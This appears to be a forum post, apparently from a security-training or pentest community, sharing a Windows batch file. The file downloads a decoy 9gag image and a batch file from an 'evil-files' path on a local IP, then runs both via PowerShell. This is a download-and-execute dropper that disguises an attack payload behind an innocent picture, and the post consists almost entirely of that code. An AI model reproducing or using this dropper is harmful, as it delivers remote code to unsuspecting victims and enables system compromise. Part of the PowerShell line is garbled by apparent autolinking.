June 22, 2020 at 6:54 pm
#40553
Kayoh
Participant
the image is: https://images-cdn.9gag.com/photo/ag5pMyg_460s.jpg
my file is:
@echo off
set files=’https://images-cdn.9gag.com/photo/ag5pMyg_460s.jpg’,‘http://10.0.2.15/evil-files/8080httpempire.bat’
powershell “(%files%)|foreach{$fileName=’%TEMP%’+(Split-Path -Path $_ -Leaf);(new-object http://System.Net.WebClient).DownloadFile($_,$fileName);Invoke-Item $fileName;}”